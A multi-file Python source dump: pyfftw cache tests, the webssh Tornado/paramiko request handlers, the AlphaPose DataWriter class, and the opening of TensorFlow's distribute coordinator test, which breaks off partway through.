        self.assertEqual(_cache.keepalive_time, 0.1)

        _cache.set_keepalive_time(0.3)
        self.assertEqual(_cache.keepalive_time, 0.3)

        _cache.set_keepalive_time(10.0)
        self.assertEqual(_cache.keepalive_time, 10.0)

        # Numeric strings are accepted and converted to float.
        _cache.set_keepalive_time('0.2')
        self.assertEqual(_cache.keepalive_time, 0.2)

        with self.assertRaises(ValueError):
            _cache.set_keepalive_time('foo')

        with self.assertRaises(TypeError):
            _cache.set_keepalive_time([])

    @unittest.skipIf(*miss('64'))
    def test_contains(self):
        # The ``in`` operator reflects cache membership.
        _cache = interfaces.cache._Cache()

        key = 'the key'

        test_array = numpy.random.randn(16)
        obj = builders.fft(test_array)
        _cache.insert(obj, key)

        self.assertTrue(key in _cache)
        self.assertFalse('Not a key' in _cache)

    @unittest.skipIf(*miss('64'))
    def test_objects_removed_after_keepalive(self):
        # Entries should disappear after roughly keepalive_time, and
        # survive while repeatedly accessed within that window.
        _cache = interfaces.cache._Cache()

        key = 'the key'

        test_array = numpy.random.randn(16)
        obj = builders.fft(test_array)
        _cache.insert(obj, key)
        self.assertIs(_cache.lookup(key), obj)

        keepalive_time = _cache.keepalive_time

        if os.name == 'nt':
            # A hack to keep appveyor from falling over here. I suspect the
            # contention is too much to work properly. Either way, let's
            # assume it's a windows problem for now...
            time.sleep(keepalive_time * 8)
        else:
            # Relax a bit more otherwise
            time.sleep(keepalive_time * 4)

        self.assertRaises(KeyError, _cache.lookup, key)

        _cache.insert(obj, key)
        old_keepalive_time = _cache.keepalive_time
        _cache.set_keepalive_time(old_keepalive_time * 4)

        self.assertIs(_cache.lookup(key), obj)

        time.sleep(old_keepalive_time * 3.5)
        # still should be there
        self.assertIs(_cache.lookup(key), obj)

        if os.name == 'nt':
            # As above, but with a bit longer
            time.sleep(old_keepalive_time * 16)
        else:
            time.sleep(old_keepalive_time * 8)

        self.assertRaises(KeyError, _cache.lookup, key)

    def test_misaligned_data_doesnt_clobber_cache(self):
        '''A bug was highlighted in #197 in which misaligned data causes
        an overwrite of an FFTW internal array which is also the same as
        an output array. The correct behaviour is for the cache to have
        alignment as a key to stop this happening.
        '''
        interfaces.cache.enable()
        N = 64
        pyfftw.interfaces.cache.enable()
        np.random.seed(12345)
        # V's view into Vm is offset by one item, so U and V have different
        # alignments and must map to different cache entries.
        Um = pyfftw.empty_aligned((N, N+1), dtype=np.float32, order='C')
        Vm = pyfftw.empty_aligned((N, N+1), dtype=np.float32, order='C')
        U = np.ndarray((N, N), dtype=Um.dtype, buffer=Um.data, offset=0)
        V = np.ndarray(
            (N, N), dtype=Vm.dtype, buffer=Vm.data, offset=Vm.itemsize)
        U[:] = np.random.randn(N, N).astype(np.float32)
        V[:] = np.random.randn(N, N).astype(np.float32)
        # Hash the inputs so any in-place clobbering is detectable below.
        uh = hashlib.md5(U).hexdigest()
        vh = hashlib.md5(V).hexdigest()
        x = interfaces.numpy_fft.rfftn(
            U, None, axes=(0, 1), overwrite_input=False)
        y = interfaces.numpy_fft.rfftn(
            V, None, axes=(0, 1), overwrite_input=False)
        # The inputs must be untouched by the transforms.
        self.assertTrue(uh == hashlib.md5(U).hexdigest())
        self.assertTrue(vh == hashlib.md5(V).hexdigest())
        interfaces.cache.disable()
class InterfacesNumpyFFTCacheTestIFFT(InterfacesNumpyFFTCacheTestFFT):
    # Same cache-enabled battery, exercising ifft.
    func = 'ifft'
class InterfacesNumpyFFTCacheTestRFFT(InterfacesNumpyFFTCacheTestFFT):
    # Same cache-enabled battery, exercising rfft.
    func = 'rfft'
class InterfacesNumpyFFTCacheTestIRFFT(InterfacesNumpyFFTCacheTestFFT):
    # Same cache-enabled battery, exercising irfft (an inverse real
    # transform, flagged by realinv).
    func = 'irfft'
    realinv = True
class InterfacesNumpyFFTCacheTestFFT2(InterfacesNumpyFFTCacheTestFFT):
    # 2D transforms take an 'axes' tuple rather than a single 'axis'.
    axes_kw = 'axes'
    # NOTE(review): 'ifft2' in a class named ...FFT2 looks like a copy/paste
    # slip, but the IFFT2 subclass below uses the same value — confirm
    # against upstream before changing.
    func = 'ifft2'
    test_shapes = (
        ((128, 64), {'axes': None}),
        ((128, 32), {'axes': None}),
        ((32, 64), {'axes': (-2, -1)}),
        ((4, 6, 8, 4), {'axes': (0, 3)}),
    )

    # (input shape, args, expected exception, description)
    invalid_args = (
        ((100,), ((100, 200),), ValueError, 'Shape error'),
        ((100, 200), ((100, 200, 100),), ValueError, 'Shape error'),
        ((100,), ((100, 200), (-3, -2, -1)), ValueError, 'Shape error'),
        ((100, 200), (100, -1), TypeError, ''),
        ((100, 200), ((100, 200), (-3, -2)), IndexError, 'Invalid axes'),
        ((100, 200), ((100,), (-3,)), IndexError, 'Invalid axes'))
class InterfacesNumpyFFTCacheTestIFFT2(InterfacesNumpyFFTCacheTestFFT2):
    # Same 2D cache-enabled battery, exercising ifft2.
    func = 'ifft2'
class InterfacesNumpyFFTCacheTestRFFT2(InterfacesNumpyFFTCacheTestFFT2):
    # Same 2D cache-enabled battery, exercising rfft2.
    func = 'rfft2'
class InterfacesNumpyFFTCacheTestIRFFT2(InterfacesNumpyFFTCacheTestFFT2):
    # Same 2D cache-enabled battery, exercising irfft2 (inverse real).
    func = 'irfft2'
    realinv = True
class InterfacesNumpyFFTCacheTestFFTN(InterfacesNumpyFFTCacheTestFFT2):
    # NOTE(review): 'ifftn' in a class named ...FFTN mirrors the FFT2 case
    # above — confirm against upstream before changing.
    func = 'ifftn'
    test_shapes = (
        ((128, 32, 4), {'axes': None}),
        ((64, 128, 16), {'axes': (0, 1, 2)}),
        ((4, 6, 8, 4), {'axes': (0, 3, 1)}),
        ((4, 6, 8, 4), {'axes': (0, 3, 1, 2)}),
    )
class InterfacesNumpyFFTCacheTestIFFTN(InterfacesNumpyFFTCacheTestFFTN):
    # Same N-D cache-enabled battery, exercising ifftn.
    func = 'ifftn'
class InterfacesNumpyFFTCacheTestRFFTN(InterfacesNumpyFFTCacheTestFFTN):
    # Same N-D cache-enabled battery, exercising rfftn.
    func = 'rfftn'
class InterfacesNumpyFFTCacheTestIRFFTN(InterfacesNumpyFFTCacheTestFFTN):
    # Same N-D cache-enabled battery, exercising irfftn (inverse real).
    func = 'irfftn'
    realinv = True
# Every test case in this module, in the order run_test_suites should
# build the suite.
test_cases = (
        CacheTest,
        InterfacesCacheTest,
        CacheSpecificInterfacesUtils,
        InterfacesNumpyFFTCacheTestFFT,
        InterfacesNumpyFFTCacheTestIFFT,
        InterfacesNumpyFFTCacheTestRFFT,
        InterfacesNumpyFFTCacheTestIRFFT,
        InterfacesNumpyFFTCacheTestFFT2,
        InterfacesNumpyFFTCacheTestIFFT2,
        InterfacesNumpyFFTCacheTestRFFT2,
        InterfacesNumpyFFTCacheTestIRFFT2,
        InterfacesNumpyFFTCacheTestFFTN,
        InterfacesNumpyFFTCacheTestIFFTN,
        InterfacesNumpyFFTCacheTestRFFTN,
        InterfacesNumpyFFTCacheTestIRFFTN,)

# None runs everything; a collection of names would restrict the run.
test_set = None

if __name__ == '__main__':
    run_test_suites(test_cases, test_set)
|
handler.py | import io
import json
import logging
import socket
import struct
import threading
import traceback
import weakref
import paramiko
import tornado.web
from tornado.ioloop import IOLoop
from tornado.options import options
from webssh.utils import (
is_valid_ip_address, is_valid_port, is_valid_hostname, to_bytes, to_str,
to_int, to_ip_address, UnicodeType, is_name_open_to_public, is_ip_hostname
)
from webssh.worker import Worker, recycle_worker, clients
try:
from concurrent.futures import Future
except ImportError:
from tornado.concurrent import Future
try:
from json.decoder import JSONDecodeError
except ImportError:
JSONDecodeError = ValueError
# Seconds to wait before recycling an unclaimed Worker.
DELAY = 3
# Upper bound (characters) accepted for an uploaded private key.
KEY_MAX_SIZE = 16384
# Standard ssh port, used when the form leaves the port blank.
DEFAULT_PORT = 22

# When True, HTTP errors on POST are reported as a JSON status payload
# instead of an HTML error page (see IndexHandler.write_error).
swallow_http_errors = True
# set by config_open_to_public
open_to_public = {
    'http': None,
    'https': None
}
def config_open_to_public(address, server_type):
    """Record whether the server bound to *address* is open to the public.

    The result is stored in the module-level ``open_to_public`` dict under
    *server_type* ('http' or 'https') and consulted later by
    ``MixinHandler.is_forbidden``.
    """
    # bool() replaces the redundant ``True if ... else False`` ternary.
    status = bool(is_name_open_to_public(address))
    logging.debug('{} server open to public: {}'.format(server_type, status))
    open_to_public[server_type] = status
class InvalidValueError(Exception):
    """Raised when a request argument is missing or malformed."""
    pass
class MixinHandler(object):
    """Shared behaviour for all handlers: access control, http->https
    redirection, custom response headers and client-address helpers."""

    custom_headers = {
        'Server': 'TornadoServer'
    }

    # Minimal HTML error page template.
    html = ('<html><head><title>{code} {reason}</title></head><body>{code} '
            '{reason}</body></html>')

    def initialize(self, loop=None):
        self.check_request()
        self.loop = loop

    def check_request(self):
        """Vet the request before normal dispatch.

        is_forbidden() is tri-state: truthy -> respond 403, False ->
        redirect to the https port, None -> allow and remember context.
        """
        context = self.request.connection.context
        result = self.is_forbidden(context, self.request.host_name)

        # finish()/redirect() are called outside the normal request flow,
        # so the transform list must exist first.
        self._transforms = []
        if result:
            self.set_status(403)
            self.finish(
                self.html.format(code=self._status_code, reason=self._reason)
            )
        elif result is False:
            to_url = self.get_redirect_url(
                self.request.host_name, options.sslport, self.request.uri
            )
            self.redirect(to_url, permanent=True)
        else:
            self.context = context

    def is_forbidden(self, context, hostname):
        """Tri-state access check.

        Returns True to forbid, False to request an https redirect, and
        None (implicitly) to allow.
        """
        ip = context.address[0]
        lst = context.trusted_downstream
        if lst and ip not in lst:
            logging.warning(
                'IP {!r} not found in trusted downstream {!r}'.format(ip, lst)
            )
            return True

        # Plain-http requests from public addresses may be redirected to
        # https (when enabled) or refused outright.
        if open_to_public['http'] and context._orig_protocol == 'http':
            if not to_ip_address(ip).is_private:
                if open_to_public['https'] and options.redirect:
                    if not is_ip_hostname(hostname):
                        # redirecting
                        return False

                if options.fbidhttp:
                    logging.warning('Public plain http request is forbidden.')
                    return True

    def get_redirect_url(self, hostname, port, uri):
        """Build the https URL for a redirect, omitting the default port."""
        port = '' if port == 443 else ':%s' % port
        return 'https://{}{}{}'.format(hostname, port, uri)

    def set_default_headers(self):
        for header in self.custom_headers.items():
            self.set_header(*header)

    def get_value(self, name):
        """Return a required, non-empty request argument or raise."""
        value = self.get_argument(name)
        if not value:
            raise InvalidValueError('Missing value {}'.format(name))
        return value

    def get_client_addr(self):
        # Honour proxy headers only when explicitly configured.
        if options.xheaders:
            return self.get_real_client_addr() or self.context.address
        else:
            return self.context.address

    def get_real_client_addr(self):
        """Recover the (ip, port) reported by a reverse proxy, or None
        when the request did not come through one."""
        ip = self.request.remote_ip

        if ip == self.request.headers.get('X-Real-Ip'):
            port = self.request.headers.get('X-Real-Port')
        elif ip in self.request.headers.get('X-Forwarded-For', ''):
            port = self.request.headers.get('X-Forwarded-Port')
        else:
            # not running behind an nginx server
            return

        port = to_int(port)
        if port is None or not is_valid_port(port):
            # fake port
            port = 65535
        return (ip, port)
class NotFoundHandler(MixinHandler, tornado.web.ErrorHandler):
    """Catch-all handler: every request it receives is answered with 404."""

    def initialize(self):
        super(NotFoundHandler, self).initialize()

    def prepare(self):
        raise tornado.web.HTTPError(404)
class IndexHandler(MixinHandler, tornado.web.RequestHandler):
    """Serves the terminal page (GET) and opens SSH connections (POST).

    A successful POST spawns a Worker that holds the ssh channel and
    returns its id to the browser, which then attaches via WsockHandler.
    """

    def initialize(self, loop, policy, host_keys_settings):
        super(IndexHandler, self).initialize(loop)
        self.policy = policy  # paramiko missing-host-key policy
        self.host_keys_settings = host_keys_settings
        self.ssh_client = self.get_ssh_client()
        self.privatekey_filename = None
        self.debug = self.settings.get('debug', False)
        # JSON payload eventually written back to the browser.
        self.result = dict(id=None, status=None, encoding=None)

    def write_error(self, status_code, **kwargs):
        """For POSTs, report errors as a JSON status payload (HTTP 200)
        so the front-end can render them; otherwise fall back to the
        default HTML error page."""
        if swallow_http_errors and self.request.method == 'POST':
            exc_info = kwargs.get('exc_info')
            if exc_info:
                reason = getattr(exc_info[1], 'log_message', None)
                if reason:
                    self._reason = reason
            self.result.update(status=self._reason)
            self.set_status(200)
            self.finish(self.result)
        else:
            super(IndexHandler, self).write_error(status_code, **kwargs)

    def get_ssh_client(self):
        """Build a paramiko SSHClient wired to the configured host keys."""
        ssh = paramiko.SSHClient()
        # Private attributes are set directly so system/user host keys can
        # be injected from the application's settings.
        ssh._system_host_keys = self.host_keys_settings['system_host_keys']
        ssh._host_keys = self.host_keys_settings['host_keys']
        ssh._host_keys_filename = self.host_keys_settings['host_keys_filename']
        ssh.set_missing_host_key_policy(self.policy)
        return ssh

    def get_privatekey(self):
        """Return the private-key text from either the multipart upload or
        the urlencoded form field; raise if it exceeds KEY_MAX_SIZE."""
        name = 'privatekey'
        lst = self.request.files.get(name)
        if lst:
            # multipart form
            self.privatekey_filename = lst[0]['filename']
            data = lst[0]['body']
            value = self.decode_argument(data, name=name).strip()
        else:
            # urlencoded form
            value = self.get_argument(name, u'')

        if len(value) > KEY_MAX_SIZE:
            raise InvalidValueError(
                'Invalid private key: {}'.format(self.privatekey_filename)
            )
        return value

    @classmethod
    def get_specific_pkey(cls, pkeycls, privatekey, password):
        """Try to parse *privatekey* as *pkeycls*; return None on a
        format mismatch, re-raise when only the password is wrong."""
        logging.info('Trying {}'.format(pkeycls.__name__))
        try:
            pkey = pkeycls.from_private_key(io.StringIO(privatekey),
                                            password=password)
        except paramiko.PasswordRequiredException:
            raise
        except paramiko.SSHException:
            pass
        else:
            return pkey

    @classmethod
    def get_pkey_obj(cls, privatekey, password, filename):
        """Parse *privatekey* against every supported key type.

        Raises InvalidValueError when no type matches or the password
        fails to decrypt the key.
        """
        bpass = to_bytes(password) if password else None
        pkey = cls.get_specific_pkey(paramiko.RSAKey, privatekey, bpass)\
            or cls.get_specific_pkey(paramiko.DSSKey, privatekey, bpass)\
            or cls.get_specific_pkey(paramiko.ECDSAKey, privatekey, bpass)\
            or cls.get_specific_pkey(paramiko.Ed25519Key, privatekey, bpass)
        if not pkey:
            if not password:
                error = 'Invalid private key: {}'.format(filename)
            else:
                # NOTE(review): the message echoes the password back to the
                # client — consider redacting.
                error = (
                    'Wrong password {!r} for decrypting the private key.'
                ) .format(password)
            raise InvalidValueError(error)
        return pkey

    def get_hostname(self):
        """Return a validated hostname or IP address from the form."""
        value = self.get_value('hostname')
        # ``or`` rather than bitwise ``|``: the same result on booleans,
        # but short-circuiting and the idiomatic logical test.
        if not (is_valid_hostname(value) or is_valid_ip_address(value)):
            raise InvalidValueError('Invalid hostname: {}'.format(value))
        return value

    def get_port(self):
        """Return the requested port, defaulting to 22 when omitted."""
        value = self.get_argument('port', u'')
        if not value:
            return DEFAULT_PORT

        port = to_int(value)
        if port is None or not is_valid_port(port):
            raise InvalidValueError('Invalid port: {}'.format(value))
        return port

    def lookup_hostname(self, hostname, port):
        """With a RejectPolicy, only known host keys may be connected to."""
        key = hostname if port == 22 else '[{}]:{}'.format(hostname, port)

        if self.ssh_client._system_host_keys.lookup(key) is None:
            if self.ssh_client._host_keys.lookup(key) is None:
                raise ValueError(
                    'Connection to {}:{} is not allowed.'.format(
                        hostname, port)
                )

    def get_args(self):
        """Collect and validate the ssh connection arguments from the form.

        Returns (hostname, port, username, password, pkey); when a private
        key is supplied, the password is treated as its passphrase and the
        connection password is cleared.
        """
        hostname = self.get_hostname()
        port = self.get_port()
        if isinstance(self.policy, paramiko.RejectPolicy):
            self.lookup_hostname(hostname, port)
        username = self.get_value('username')
        password = self.get_argument('password', u'')
        privatekey = self.get_privatekey()
        if privatekey:
            pkey = self.get_pkey_obj(
                privatekey, password, self.privatekey_filename
            )
            password = None
        else:
            pkey = None
        args = (hostname, port, username, password, pkey)
        # NOTE(review): args includes the password; debug-logging it can
        # leak credentials into log files — consider redacting.
        logging.debug(args)
        return args

    def get_default_encoding(self, ssh):
        """Ask the remote shell for its charmap; fall back to utf-8."""
        try:
            _, stdout, _ = ssh.exec_command('locale charmap')
        except paramiko.SSHException:
            result = None
        else:
            result = to_str(stdout.read().strip())
        return result if result else 'utf-8'

    def ssh_connect(self):
        """Open the ssh session and wrap its shell channel in a Worker.

        Connection-level failures are normalized to ValueError so post()
        can report them as a status string.
        """
        ssh = self.ssh_client
        try:
            args = self.get_args()
        except InvalidValueError as exc:
            raise tornado.web.HTTPError(400, str(exc))

        dst_addr = (args[0], args[1])
        logging.info('Connecting to {}:{}'.format(*dst_addr))

        try:
            ssh.connect(*args, timeout=6)
        except socket.error:
            raise ValueError('Unable to connect to {}:{}'.format(*dst_addr))
        except paramiko.BadAuthenticationType:
            raise ValueError('Bad authentication type.')
        except paramiko.AuthenticationException:
            raise ValueError('Authentication failed.')
        except paramiko.BadHostKeyException:
            raise ValueError('Bad host key.')

        chan = ssh.invoke_shell(term='xterm')
        # setblocking(False) is equivalent to setblocking(0), just clearer.
        chan.setblocking(False)
        worker = Worker(self.loop, ssh, chan, dst_addr, self.src_addr)
        worker.encoding = self.get_default_encoding(ssh)
        return worker

    def ssh_connect_wrapped(self, future):
        """Thread target: resolve *future* with a Worker or the exception."""
        try:
            worker = self.ssh_connect()
        except Exception as exc:
            logging.error(traceback.format_exc())
            future.set_exception(exc)
        else:
            future.set_result(worker)

    def head(self):
        pass

    def get(self):
        self.render('index.html', debug=self.debug)

    @tornado.gen.coroutine
    def post(self):
        if self.debug and self.get_argument('error', u''):
            # for testing purpose only
            raise ValueError('Uncaught exception')

        self.src_addr = self.get_client_addr()
        if len(clients.get(self.src_addr[0], {})) >= options.maxconn:
            raise tornado.web.HTTPError(403, 'Too many connections.')

        future = Future()
        t = threading.Thread(target=self.ssh_connect_wrapped, args=(future,))
        # Thread.setDaemon() is deprecated (removed in Python 3.13);
        # assigning the daemon attribute is the supported spelling.
        t.daemon = True
        t.start()

        try:
            worker = yield future
        except (ValueError, paramiko.SSHException) as exc:
            self.result.update(status=str(exc))
        else:
            workers = clients.setdefault(worker.src_addr[0], {})
            workers[worker.id] = worker
            # Recycle the worker if the browser never claims it.
            self.loop.call_later(DELAY, recycle_worker, worker)
            self.result.update(id=worker.id, encoding=worker.encoding)

        self.write(self.result)
class WsockHandler(MixinHandler, tornado.websocket.WebSocketHandler):
    """Websocket endpoint bridging the browser terminal and the ssh
    channel held by a previously created Worker."""
    # NOTE(review): this class references tornado.websocket, but this
    # module only shows ``import tornado.web`` — confirm tornado.websocket
    # is imported before this definition executes.

    def initialize(self, loop):
        super(WsockHandler, self).initialize(loop)
        # Weak reference to the claimed Worker; None until open() succeeds.
        self.worker_ref = None

    def open(self):
        """Claim the Worker whose id the client supplies; otherwise close
        the socket with an authentication failure."""
        self.src_addr = self.get_client_addr()
        logging.info('Connected from {}:{}'.format(*self.src_addr))

        # Workers are keyed by the client IP that created them.
        workers = clients.get(self.src_addr[0])
        if not workers:
            self.close(reason='Websocket authentication failed.')
            return

        try:
            worker_id = self.get_value('id')
        except (tornado.web.MissingArgumentError, InvalidValueError) as exc:
            self.close(reason=str(exc))
        else:
            worker = workers.get(worker_id)
            if worker:
                # Null the slot so the worker can be claimed only once.
                workers[worker_id] = None
                self.set_nodelay(True)
                worker.set_handler(self)
                self.worker_ref = weakref.ref(worker)
                self.loop.add_handler(worker.fd, worker, IOLoop.READ)
            else:
                self.close(reason='Websocket authentication failed.')

    def on_message(self, message):
        """Handle a JSON message: {'resize': [cols, rows]} resizes the pty
        and {'data': '...'} forwards keystrokes to the ssh channel."""
        logging.debug('{!r} from {}:{}'.format(message, *self.src_addr))
        # NOTE(review): worker_ref() can return None once the worker has
        # been collected; a guard before use may be warranted — confirm
        # against upstream.
        worker = self.worker_ref()
        try:
            msg = json.loads(message)
        except JSONDecodeError:
            return

        if not isinstance(msg, dict):
            return

        resize = msg.get('resize')
        if resize and len(resize) == 2:
            try:
                worker.chan.resize_pty(*resize)
            except (TypeError, struct.error, paramiko.SSHException):
                pass

        data = msg.get('data')
        if data and isinstance(data, UnicodeType):
            worker.data_to_dst.append(data)
            worker.on_write()

    def on_close(self):
        """Log the disconnect and shut down the associated worker."""
        if self.close_reason:
            logging.info(
                'Disconnecting to {}:{} with reason: {reason}'.format(
                    *self.src_addr, reason=self.close_reason
                )
            )
        else:
            self.close_reason = 'client disconnected'
            logging.info('Disconnected from {}:{}'.format(*self.src_addr))

        worker = self.worker_ref() if self.worker_ref else None
        if worker:
            worker.close(reason=self.close_reason)
|
writer.py | import os
import time
from threading import Thread
from queue import Queue
import cv2
import numpy as np
import torch
import torch.multiprocessing as mp
from alphapose.utils.transforms import get_func_heatmap_to_coord
from alphapose.utils.pPose_nms import pose_nms
# Fallback options for cv2.VideoWriter when the caller supplies none.
DEFAULT_VIDEO_SAVE_OPT = {
    'savepath': 'examples/res/1.mp4',
    'fourcc': cv2.VideoWriter_fourcc(*'mp4v'),
    'fps': 25,
    'frameSize': (640, 480)
}

# Keypoint indices used for evaluation (all 17 COCO joints, in order).
EVAL_JOINTS = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]
class DataWriter():
    """Consumes per-frame pose-estimation results from a queue, runs pose
    NMS (plus optional PoseFlow tracking), and writes visualized images,
    video and the accumulated final results."""

    def __init__(self, cfg, opt, save_video=False,
                 video_save_opt=DEFAULT_VIDEO_SAVE_OPT,
                 queueSize=1024):
        self.cfg = cfg
        self.opt = opt
        self.video_save_opt = video_save_opt

        self.eval_joints = EVAL_JOINTS
        self.save_video = save_video
        self.final_result = []
        self.heatmap_to_coord = get_func_heatmap_to_coord(cfg)
        # initialize the queue used to store frames read from
        # the video file
        # (thread-backed queues for single-process mode, multiprocessing
        # queues otherwise)
        if opt.sp:
            self.result_queue = Queue(maxsize=queueSize)
            self.final_result_queue = Queue(maxsize=queueSize)
        else:
            self.result_queue = mp.Queue(maxsize=queueSize)
            self.final_result_queue = mp.Queue(maxsize=queueSize)

        if opt.save_img:
            if not os.path.exists(opt.outputpath + '/vis'):
                os.mkdir(opt.outputpath + '/vis')

        if opt.pose_track:
            # Imported lazily so PoseFlow is only required when tracking.
            from PoseFlow.poseflow_infer import PoseFlowWrapper
            self.pose_flow_wrapper = PoseFlowWrapper(save_path=os.path.join(opt.outputpath, 'poseflow'))

    def start_worker(self, target):
        """Run *target* in a thread (single-process mode) or a subprocess."""
        if self.opt.sp:
            p = Thread(target=target, args=())
        else:
            p = mp.Process(target=target, args=())
        # p.daemon = True
        p.start()
        return p

    def start(self):
        # start a thread to read pose estimation results per frame
        self.result_worker = self.start_worker(self.update)
        return self

    def update(self):
        """Worker loop: drain result_queue, post-process each frame and
        push the outcome onto final_result_queue until a None image
        sentinel arrives."""
        if self.save_video:
            # initialize the file video stream, adapt output video resolution to original video
            stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
            if not stream.isOpened():
                print("Try to use other video encoders...")
                ext = self.video_save_opt['savepath'].split('.')[-1]
                fourcc, _ext = self.recognize_video_ext(ext)
                self.video_save_opt['fourcc'] = fourcc
                self.video_save_opt['savepath'] = self.video_save_opt['savepath'][:-4] + _ext
                stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
            assert stream.isOpened(), 'Cannot open video for writing'
        # keep looping infinitely
        while True:
            # ensure the queue is not empty and get item
            (boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name) = self.wait_and_get(self.result_queue)
            if orig_img is None:
                # if the thread indicator variable is set (img is None), stop the thread
                self.wait_and_put(self.final_result_queue, None)
                if self.save_video:
                    stream.release()
                return
            # image channel RGB->BGR
            orig_img = np.array(orig_img, dtype=np.uint8)[:, :, ::-1]
            if boxes is None:
                # No detections: emit the bare frame if any output is wanted.
                if self.opt.save_img or self.save_video or self.opt.vis:
                    self.write_image(orig_img, im_name, stream=stream if self.save_video else None)
            else:
                # location prediction (n, kp, 2) | score prediction (n, kp, 1)
                pred = hm_data.cpu().data.numpy()
                assert pred.ndim == 4

                # 49 channels indicates the dense-keypoint model variant.
                if hm_data.size()[1] == 49:
                    self.eval_joints = [*range(0,49)]
                pose_coords = []
                pose_scores = []
                for i in range(hm_data.shape[0]):
                    bbox = cropped_boxes[i].tolist()
                    pose_coord, pose_score = self.heatmap_to_coord(pred[i][self.eval_joints], bbox)
                    pose_coords.append(torch.from_numpy(pose_coord).unsqueeze(0))
                    pose_scores.append(torch.from_numpy(pose_score).unsqueeze(0))
                preds_img = torch.cat(pose_coords)
                preds_scores = torch.cat(pose_scores)

                # Suppress overlapping person candidates.
                result = pose_nms(boxes, scores, ids, preds_img, preds_scores, self.opt.min_box_area)

                result = {
                    'imgname': im_name,
                    'result': result
                }

                if self.opt.pose_track:
                    # Attach PoseFlow track ids to each person.
                    poseflow_result = self.pose_flow_wrapper.step(orig_img, result)
                    for i in range(len(poseflow_result)):
                        result['result'][i]['idx'] = poseflow_result[i]['idx']

                self.wait_and_put(self.final_result_queue, result)
                if self.opt.save_img or self.save_video or self.opt.vis:
                    if hm_data.size()[1] == 49:
                        from alphapose.utils.vis import vis_frame_dense as vis_frame
                    elif self.opt.vis_fast:
                        from alphapose.utils.vis import vis_frame_fast as vis_frame
                    else:
                        from alphapose.utils.vis import vis_frame
                    img = vis_frame(orig_img, result, add_bbox=(self.opt.pose_track | self.opt.tracking | self.opt.showbox))
                    self.write_image(img, im_name, stream=stream if self.save_video else None)

    def write_image(self, img, im_name, stream=None):
        """Show, save to disk and/or append *img* to the video stream,
        depending on the active options."""
        if self.opt.vis:
            cv2.imshow("AlphaPose Demo", img)
            cv2.waitKey(30)
        if self.opt.save_img:
            cv2.imwrite(os.path.join(self.opt.outputpath, 'vis', im_name), img)
        if self.save_video:
            stream.write(img)

    def wait_and_put(self, queue, item):
        # Blocking put; isolated here so queue behaviour can be changed
        # in one place.
        queue.put(item)

    def wait_and_get(self, queue):
        # Blocking get, mirror of wait_and_put.
        return queue.get()

    def save(self, boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name):
        self.commit()
        # save next frame in the queue
        self.wait_and_put(self.result_queue, (boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name))

    def running(self):
        # indicate that the thread is still running
        time.sleep(0.2)
        self.commit()
        return not self.result_queue.empty()

    def count(self):
        # indicate the remaining images
        return self.result_queue.qsize()

    def stop(self):
        # indicate that the thread should be stopped
        # (an all-None tuple is the termination sentinel consumed by update)
        self.save(None, None, None, None, None, None, None)
        # Drain remaining results until the None sentinel comes back.
        while True:
            final_res = self.wait_and_get(self.final_result_queue)
            if final_res:
                self.final_result.append(final_res)
            else:
                break
        self.result_worker.join()

    def clear_queues(self):
        self.clear(self.result_queue)
        self.clear(self.final_result_queue)

    def clear(self, queue):
        # NOTE(review): empty()/get() is race-prone with a live producer;
        # acceptable here only because clearing happens after shutdown.
        while not queue.empty():
            queue.get()

    def commit(self):
        # commit finished final results to main process
        while not self.final_result_queue.empty():
            self.final_result.append(self.wait_and_get(self.final_result_queue))

    def results(self):
        # return final result
        return self.final_result

    def recognize_video_ext(self, ext=''):
        """Map a file extension to a (fourcc, '.ext') pair, defaulting
        to mp4 for unknown formats."""
        if ext == 'mp4':
            return cv2.VideoWriter_fourcc(*'mp4v'), '.' + ext
        elif ext == 'avi':
            return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
        elif ext == 'mov':
            return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
        else:
            print("Unknow video format {}, will use .mp4 instead of it".format(ext))
            return cv2.VideoWriter_fourcc(*'mp4v'), '.mp4'
|
distribute_coordinator_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Distribute Coordinator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import copy
import json
import os
import sys
import time
import threading
import six
# pylint: disable=invalid-name
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: enable=invalid-name
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.distribute import distribute_coordinator
from tensorflow.python.distribute import distribute_coordinator_context
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import monitored_session
# Short aliases for the coordinator's task types and run modes.
CHIEF = distribute_coordinator._TaskType.CHIEF
WORKER = distribute_coordinator._TaskType.WORKER
PS = distribute_coordinator._TaskType.PS
EVALUATOR = distribute_coordinator._TaskType.EVALUATOR
STANDALONE_CLIENT = distribute_coordinator.CoordinatorMode.STANDALONE_CLIENT
INDEPENDENT_WORKER = distribute_coordinator.CoordinatorMode.INDEPENDENT_WORKER

# Size of the shared in-process cluster created in setUpClass.
NUM_WORKERS = 3
NUM_PS = 2

# Keep a handle on the real sys.exit so tests can patch and restore it.
original_sys_exit = sys.exit
def _bytes_to_str(maybe_bytes):
    """Return *maybe_bytes* unchanged if it is already text, otherwise
    decode it as UTF-8."""
    if isinstance(maybe_bytes, six.string_types):
        return maybe_bytes
    return str(maybe_bytes, "utf-8")
def _strip_protocol(target):
# cluster_spec expects "host:port" strings.
